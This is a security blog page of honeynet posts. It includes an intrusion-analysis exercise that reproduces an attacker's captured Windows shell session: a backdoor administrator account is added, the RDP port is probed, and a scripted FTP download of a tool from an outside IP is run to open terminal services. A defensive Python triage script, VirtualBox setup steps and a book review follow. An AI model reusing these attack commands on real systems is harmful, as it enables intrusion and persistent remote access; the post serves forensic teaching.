Showing posts with label Honeynet. Show all posts

Monday, May 12, 2008

My arch-nemesis

Over the weekend my honeynet got pwned. I mean that in every sense of the word. I'm looking at a 50% rate of compromise. I contained the honeynet and planned on dealing with it this morning. While performing some live response on what I'd targeted as patient zero, my screen went black and my room suddenly got quiet. My office usually hums at about 70 dB, so when my PowerEdge server, firewall, Precision workstation, switches, KVM, Mac mini, 2 workstations AND MY HONEYNET go quiet it's pretty noticeable. I had been in the process of collecting physical memory and...poof.

At first I thought I had popped the breaker. Let's face it, I have quite a bit plugged in. Then my thought process started up again...wait, I've never popped the breaker...why all of a sudden?

There was a bit of shouting and people started running down the hall to see if I'd broken something...kind of funny. I then remembered something...electricians had been sighted early in the day. My subordinate confirmed this.

"I just saw someone run from that office in to the other room" he said pointing further down the hall.



I walked to the next office and poked my head in...

ME: "Hey are the electricians screwing with stuff?"

COWORKER: "They shouldn't be".

ME: "Well my office just went dark, where are they?"

COWORKER: "Oh, they're next door, let's go talk to them"

ME: "Probably a good idea".

We both poke our heads into the next room and I spot a power whip lying in the middle of the floor, as if to mock me and display the prowess of the master electrician, and 3 guys looking at prints. On the wall I spot an open single-gang box with wires mashed in a wire nut. That wall is the exact wall where I get power...

ME: "Are you guys messing with power in here?"

ELECTRICIAN: "We saw a few extra wires attached to that whip and had to disconnect it," he says, looking at me sheepishly.

...silence...
...silence...
...silence...

ME: "You just took down my office".

ELECTRICIAN: "Yeah sorry about that, that's my bad. I had to disconnect the leads on that whip".

I was lost for words. My arch-nemesis killed all reasonable hope of me collecting information. The VM, on boot-up, gave me some corrupted filesystem errors, and the other virtual machines I had running had obviously lost power as well.

Why is the electrician my arch-nemesis you ask? Let's just say this isn't the first time they've struck.

Sunday, January 20, 2008

Analyze this

Some time ago I shared an intrusion analysis where the attack vector was the DNS RPC vulnerability. I've decided to trim this one down a bit to let you, the reader, tell me what you think is happening here.

You receive the following IDS alert on your cell phone early in the morning:

[**] [1:2123:3] ATTACK-RESPONSES Microsoft cmd.exe banner [**]
[Classification: Successful Administrator Privilege Gain] [Priority: 1]
01/20-07:46:11.052115 10.23.62.102:1100 -> 209.112.3.231:2518
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:141
***AP*** Seq: 0xC475E121 Ack: 0xC0B32DBF Win: 0x440B TcpLen: 20
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

After searching your network logs, you discover the following:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.23.62.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.23.62.1
C:\WINDOWS\system32>net user tsinternetuser 112233!@#k. /add
The command completed successfully.
C:\WINDOWS\system32>net user tsinternetuser 112233!@#k.
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators tsinternetuser /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>echo Dim ReadComputerName >>3389port.vbs
C:\WINDOWS\system32>echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>3389port.vbs
C:\WINDOWS\system32>echo Dim TSName,TSRegPath >>3389port.vbs
C:\WINDOWS\system32>echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" >>3389port.vbs
C:\WINDOWS\system32>echo TSName=ReadComputerName.RegRead(TSRegPath) >>3389port.vbs
C:\WINDOWS\system32>echo WScript.Echo(TSName) >>3389port.vbs
C:\WINDOWS\system32>cscript 3389port.vbs
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
3389
C:\WINDOWS\system32>del 3389port.vbs
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.23.62.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.23.62.1
C:\WINDOWS\system32>query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator console 0 Active . 1/14/2008 9:08 AM
C:\WINDOWS\system32>echo open 116.2.149.117>>100.txt
C:\WINDOWS\system32>echo 123>>100.txt
C:\WINDOWS\system32>echo 123>>100.txt
C:\WINDOWS\system32>echo bin>>100.txt
C:\WINDOWS\system32>echo get 3389.exe>>100.txt
C:\WINDOWS\system32>echo bye>>100.txt
C:\WINDOWS\system32>ftp -s:100.txt
User (116.2.149.117:(none)): open 116.2.149.117
get 3389.exe
C:\WINDOWS\system32>del 100.txt
C:\WINDOWS\system32>3389 2289
Now opening terminate service...success!
OK...
C:\WINDOWS\system32>


Some questions:

Is the Snort alert an indicator or a warning? Explain your reasoning.
Given the clues, how would you begin your investigation?
What do you think the attacker was trying to do?
What does 3389port.vbs do?
What do you think 3389.exe does? (If you'd like a copy of it, email me)
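One way to start on the second question above, as an added example that is not part of the original post or of any tool it mentions: the script below takes a cmd.exe transcript like the one shown (Sebek keystrokes or a reassembled TCP stream), keeps only what was typed at the prompt, reassembles the files the attacker built with echo >>, and flags each step of the tradecraft: the new local account, its addition to Administrators, the read of the RDP PortNumber registry value, the scripted FTP download, and the later execution of the fetched binary. The embedded transcript is a constructed subset of the session above; the rule names and the Triage structure are my own.

```python
"""Triage a captured cmd.exe session for the tradecraft seen in the post:
local account creation, Administrators membership, RDP port reconnaissance,
echo-built FTP download scripts, and execution of the fetched binary.
Added example, not code from the original post or any tool it names."""
import re
from dataclasses import dataclass, field

# A prompt line looks like C:\WINDOWS\system32>command ; everything else is output.
PROMPT = re.compile(r'^[A-Za-z]:\\.*?>(.*)$')

RE_NET_USER_ADD = re.compile(r'^net\s+user\s+(\S+)\s+(\S+)\s+/add\b', re.I)
RE_ADMIN_ADD = re.compile(r'^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b', re.I)
RE_RDP_PORT = re.compile(r'Terminal Server\\WinStations\\RDP-Tcp\\PortNumber', re.I)
RE_ECHO_REDIRECT = re.compile(r'^echo\s+(.*?)\s*>>\s*(\S+)$', re.I)
RE_SCRIPT_EXEC = re.compile(r'^[cw]script\s+(?://\S+\s+)*(\S+)', re.I)
RE_FTP_SCRIPT = re.compile(r'^ftp\s+(?:-\S+\s+)*-s:(\S+)', re.I)
RE_DEL = re.compile(r'^del\s+(\S+)', re.I)

# Constructed sample: a subset of the session shown above, output lines included.
SAMPLE_SESSION = r"""Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
C:\WINDOWS\system32>net user tsinternetuser 112233!@#k. /add
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators tsinternetuser /add
The command completed successfully.
C:\WINDOWS\system32>echo TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" >>3389port.vbs
C:\WINDOWS\system32>cscript 3389port.vbs
3389
C:\WINDOWS\system32>del 3389port.vbs
C:\WINDOWS\system32>echo open 116.2.149.117>>100.txt
C:\WINDOWS\system32>echo 123>>100.txt
C:\WINDOWS\system32>echo bin>>100.txt
C:\WINDOWS\system32>echo get 3389.exe>>100.txt
C:\WINDOWS\system32>echo bye>>100.txt
C:\WINDOWS\system32>ftp -s:100.txt
C:\WINDOWS\system32>del 100.txt
C:\WINDOWS\system32>3389 2289
Now opening terminate service...success!
"""


@dataclass
class Triage:
    accounts_created: dict = field(default_factory=dict)   # user -> password as typed
    admin_additions: list = field(default_factory=list)
    ftp_servers: set = field(default_factory=set)
    downloads: set = field(default_factory=set)
    executed_payloads: list = field(default_factory=list)  # (downloaded name, args)
    findings: list = field(default_factory=list)           # (rule, command), in order


def commands(transcript):
    """Yield only what was typed at the prompt, dropping command output."""
    for line in transcript.splitlines():
        m = PROMPT.match(line)
        if m and m.group(1).strip():
            yield m.group(1).strip()


def _matches_download(token, downloads):
    """Map a typed program name ('3389') back to a fetched file ('3389.exe')."""
    token = token.lower()
    for name in downloads:
        n = name.lower()
        if token in (n, n[:-4] if n.endswith(".exe") else n):
            return name
    return None


def triage(transcript):
    t = Triage()
    built = {}  # file -> lines echoed into it (the attacker's scripts, reassembled)
    for cmd in commands(transcript):
        if m := RE_NET_USER_ADD.match(cmd):
            t.accounts_created[m.group(1)] = m.group(2)
            t.findings.append(("account_created", cmd))
        elif m := RE_ADMIN_ADD.match(cmd):
            t.admin_additions.append(m.group(1))
            t.findings.append(("admin_group_add", cmd))
        elif m := RE_ECHO_REDIRECT.match(cmd):
            content, target = m.groups()
            built.setdefault(target, []).append(content)
            if RE_RDP_PORT.search(content):
                t.findings.append(("rdp_port_recon", cmd))
        elif (m := RE_SCRIPT_EXEC.match(cmd)) and m.group(1) in built:
            t.findings.append(("echoed_script_executed", cmd))
        elif m := RE_FTP_SCRIPT.match(cmd):
            for entry in built.get(m.group(1), []):   # replay the echo-built ftp script
                words = entry.split()
                if len(words) > 1 and words[0].lower() == "open":
                    t.ftp_servers.add(words[1])
                elif len(words) > 1 and words[0].lower() in ("get", "mget"):
                    t.downloads.add(words[1])
            t.findings.append(("ftp_scripted_download", cmd))
        elif (m := RE_DEL.match(cmd)) and m.group(1) in built:
            t.findings.append(("script_cleanup", cmd))
        else:
            words = cmd.split()
            name = _matches_download(words[0], t.downloads) if words else None
            if name:
                t.executed_payloads.append((name, words[1:]))
                t.findings.append(("payload_executed", cmd))
    return t


def backdoor_accounts(t):
    """Accounts both created and added to Administrators in this session."""
    return [u for u in t.admin_additions if u in t.accounts_created]


if __name__ == "__main__":
    result = triage(SAMPLE_SESSION)
    for rule, cmd in result.findings:
        print(f"{rule:24} {cmd}")
    print("backdoor admin accounts:", backdoor_accounts(result))
    print("ftp servers:", sorted(result.ftp_servers), "downloads:", sorted(result.downloads))
```

Reassembling the echo-built files is the part worth keeping: the FTP server, credentials and fetched file name only exist spread across several echo lines, and the attacker deletes both scripts afterwards, so the transcript is the only place they survive. The same pass gives you the artefacts to go look for on the host (the tsinternetuser account, 3389.exe in system32, a changed RDP PortNumber value) before the power goes out.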

Saturday, January 12, 2008

Moving to VirtualBox

Just this past week I started migrating my honeynet to VirtualBox after struggling with some performance issues using VMware Workstation 6. My honeynet is currently housing around 20 virtual machines running on an Ubuntu 7.10 x64 Server distribution.

VirtualBox has a pretty solid set of documentation available, and they build for Ubuntu and a few other distributions, so installation is pretty easy.

I added the following to my sources.list:

deb http://www.virtualbox.org/debian gutsy non-free

First I wanted to see what packages were available.

hogfly@maluminse:~$ sudo apt-cache search virtualbox

virtualbox-ose - PC virtualization solution
virtualbox-ose-modules-2.6.22-14-generic - virtualbox-ose modules for linux-image-2.6.22-14-generic
virtualbox-ose-modules-2.6.22-14-server - virtualbox-ose modules for linux-image-2.6.22-14-server
virtualbox-ose-source - Source for the VirtualBox module
virtualbox - innotek VirtualBox


OK, so speaking from hindsight, don't install the -ose packages. You'll end up being short some VBox commands that came into play for me (VBoxAddIF, for instance).

Install was as simple as issuing sudo apt-get install virtualbox.

Once installed, I created a Windows XP virtual machine and initially left it configured to use NAT. Eventually I moved this to a bridged interface setup, giving the virtual machine direct network access.

To accomplish this I installed bridge-utils and set up a bridge.

hogfly@maluminse:~$ sudo brctl addbr vboxbr0
hogfly@maluminse:~$ sudo brctl addif vboxbr0 eth2

To add the virtual machine to the bridge I first needed to create the virtual host interface.

hogfly@maluminse:~$ sudo VBoxAddIF vbox0 hogfly vboxbr0

VirtualBox host networking interface creation utility, version 1.5.4
(C) 2005-2007 innotek GmbH
All rights reserved.

Creating the permanent host networking interface "vbox0" for user hogfly.


Now that I had the virtual host interface set up I simply added it to the bridge.

hogfly@maluminse:~$ sudo brctl addif vboxbr0 vbox0

After doing this I just gave the XP system an IP address, installed some software, shut it down and started cloning it.

Cloning a VM in VirtualBox is pretty easy. The command line utility is called VBoxManage. I've found this to be far superior to VMware's vmrun command line utility.

To clone my XP base image I simply issued the following command:

VBoxManage clonevdi XPBASE.vdi /mnt/honeypots/vbox1/Hpot1.vdi

After a few minutes the disk image was copied and I was ready to do some configuration. First, though, I had to "create" the virtual machine. This is basically just a registration of the VM's existence.

To do so I issued the following command:
hogfly@maluminse:~$ VBoxManage createvm -name gumby -register -basefolder /mnt/honeypots/vbox1/
VirtualBox Command Line Management Interface Version 1.5.4
(C) 2005-2007 innotek GmbH
All rights reserved.

Virtual machine 'gumby' is created and registered.
UUID: cd07351b-8428-4829-62b0-1e42d86dd5d9
Settings file: '/mnt/honeypots/vbox1/gumby/gumby.xml'


Now I can start it up if I so choose:

hogfly@maluminse:~$ VBoxManage startvm gumby
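The bridge, host interface, clone, createvm and startvm steps above are one procedure that gets repeated for every honeypot, and the post leaves out the step in between createvm and startvm that attaches the cloned disk and the bridged NIC to the new VM. The script below is an added example, not code from the original post or the VirtualBox project: it builds the full command sequence for a farm of clones and can run it or just print it. The flags follow the VirtualBox 1.5-era single-dash syntax the post uses (clonevdi, createvm -name/-register/-basefolder, startvm, VBoxAddIF, brctl addif); registerimage and the modifyvm options (-memory, -hda, -nic1 hostif, -hostifdev1), and the assumption that 1.x needs one host interface per bridged virtual NIC, come from the 1.5 manual and are assumptions about that version, not something the post shows. Current VirtualBox releases use clonemedium, storageattach and double-dash options instead, so treat the verbs as version-specific.

```python
"""Clone a base VDI into a farm of bridged honeypot VMs by driving the
VBoxManage / VBoxAddIF / brctl commands shown in the post. Added example, not
code from the original post or the VirtualBox project. Flags follow the
VirtualBox 1.5-era single-dash syntax; registerimage and the modifyvm options
(-memory, -hda, -nic1 hostif, -hostifdev1) are an assumption taken from the
1.5 manual and are not shown on the page."""
import posixpath
import subprocess


def plan_hostif(ifname, user, bridge):
    """One host interface per bridged VM, created and attached to the bridge
    the way the post does for vbox0 (assumption: 1.x needs one host interface
    per virtual NIC that uses hostif networking). Both calls need root."""
    return [
        ["sudo", "VBoxAddIF", ifname, user, bridge],
        ["sudo", "brctl", "addif", bridge, ifname],
    ]


def plan_clone(name, base_vdi, basefolder, hostif, memory_mb=256):
    """VBoxManage calls, in order, that turn base_vdi into a registered,
    bridged, bootable VM. Returning the plan instead of running it keeps it
    inspectable before anything touches the host. Runs as the VM owner, not root."""
    vdi = posixpath.join(basefolder, f"{name}.vdi")
    return [
        ["VBoxManage", "clonevdi", base_vdi, vdi],        # new disk UUID per copy
        ["VBoxManage", "registerimage", "disk", vdi],     # assumption: 1.x registers before attaching
        ["VBoxManage", "createvm", "-name", name, "-register", "-basefolder", basefolder],
        ["VBoxManage", "modifyvm", name,
         "-memory", str(memory_mb),
         "-hda", vdi,                                     # the attach step the post leaves implicit
         "-nic1", "hostif", "-hostifdev1", hostif],       # bridged through vboxN on vboxbr0
        ["VBoxManage", "startvm", name],
    ]


def plan_farm(prefix, count, base_vdi, basefolder, user, bridge="vboxbr0"):
    """Plans for prefix1..prefixN, each with its own folder and host interface
    (vbox0 for the first VM, as in the post, then vbox1, vbox2, ...)."""
    plans = []
    for i in range(1, count + 1):
        name = f"{prefix}{i}"
        hostif = f"vbox{i - 1}"
        plans.append(plan_hostif(hostif, user, bridge)
                     + plan_clone(name, base_vdi, posixpath.join(basefolder, name), hostif))
    return plans


def run_plan(plan, dry_run=True):
    """Run a plan step by step, stopping at the first failure so a half-built
    VM is never started. With dry_run the commands are only printed."""
    for argv in plan:
        print(" ".join(argv))
        if not dry_run:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    # Dry run for two clones of the XPBASE.vdi image from the post.
    for plan in plan_farm("hpot", 2, "XPBASE.vdi", "/mnt/honeypots", "hogfly"):
        run_plan(plan, dry_run=True)
```

Two things to check before running it for real. The bridge itself must be up (ifconfig vboxbr0 up) and, if the interface you enslave with brctl addif carries the host's own IP address, that address has to move from the physical interface to vboxbr0 or the host drops off the network the moment the interface joins the bridge; a honeynet host normally avoids this by bridging a dedicated honeypot-facing NIC that has no address of its own. And because every clone starts from the same image, change the MAC address and the guest's hostname and IP before the honeypots share a segment, or the clones will collide with each other.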


So far I'm happy with VirtualBox but we'll see how things progress.

Sunday, December 30, 2007

Honeynet Upgrade

I recently got a little funding for my honeynet and bought some new hardware for it. The major additions were some 3ware equipment, a new processor and motherboard, and lots of hard drives. I put 8 500GB SATA II Seagate ES drives in the box with a 3ware 9650SE as the RAID controller. I finally made the move to VMware as my honeynet platform, expanding the honeynet from 5 to 20 machines. I'm currently building a new website for it and adding some services to be exploited. I also moved away from the Honeynet Project's Roo CD-ROM; it just wasn't cutting it anymore. Snort 2.3 is way too outdated.

I re-used my old honeywall hardware and loaded Fedora Core 8 on the box, along with Snort, Snort running in inline mode, Argus, tcpdump, swatch, sebek-server and some other goodies. The iptables configuration was created using fwbuilder.

So ultimately the honeynet is now a hybrid, with a physical box for the honeywall and VMware-based honeypots. I'm somewhat excited and hopeful that people will attack it, but I guess time will tell.

I'd like to add some automation to the activities on the honeypots using AutoHotkey or AutoIt and RoboTask.


I was pretty shocked to find that one of my hosts was almost immediately getting dinged with Sasser.B (yeah, I said Sasser). I'm also getting some potshots taken at the Nepenthes collector. Just yesterday I picked up a binary named msnnmaneger.exe (an SDBot variant).

Tuesday, August 7, 2007

Review - Virtual Honeypots

I got this book approximately 3 days ago and absolutely tore through it. This book was fantastic in every sense of the word.

Niels Provos (of honeyd fame) and Thorsten Holz (from the German Honeynet Project) teamed up to provide a true wealth of knowledge and information in Virtual Honeypots. *note I bought it from Amazon*

As the title suggests, this book is all about creating and utilizing a virtualized environment to host honeypots. From the first chapter on there is no mincing of words, and the technical aspects are covered from setup to configuration to usage. Virtual Honeypots is a logical progression from the earlier Honeypots and Know Your Enemy (KYE) books and focuses more on the honeypot than the honeynet. There's such a wide variety of topics discussed that this book is probably best served as a reference after reading it once or twice. I was in awe when I read chapter 7, and specifically the section on the Potemkin honeyfarm, which apparently has been used to emulate over 64,000 honeypots!

This book presents itself really well, and the authors did a fantastic job covering all of the critical and really interesting projects that are out there in the honey(net|pot) world. If you operate a honeynet or honeypots, this book is not optional; it simply provides too much information to ignore. Even if you don't operate a honey(net|pot), this book is well worth the money, and it's going right on the shelf next to other quick-grab reference books.